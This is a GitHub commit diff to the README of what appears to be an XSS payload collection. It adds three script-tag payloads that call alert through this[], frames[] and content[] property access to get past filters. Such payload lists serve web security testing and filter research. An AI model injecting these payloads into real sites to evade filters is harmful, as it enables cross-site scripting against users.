Update README.md

patch-1
Rakesh Mane 2017-08-07 21:22:36 +05:30 committed by GitHub
parent dad26ce5e5
commit 6e42b617cc
1 changed files with 4 additions and 0 deletions

View File

@ -469,6 +469,10 @@ Bypass using an alternate way to execute an alert
<script>parent['alert'](1)</script> <script>parent['alert'](1)</script>
<script>self['alert'](2)</script> <script>self['alert'](2)</script>
<script>top['alert'](3)</script> <script>top['alert'](3)</script>
<script>this['alert'](4)</script>
<script>frames['alert'](5)</script>
<script>content['alert'](6)</script>
``` ```
Bypass using an alternate way to trigger an alert Bypass using an alternate way to trigger an alert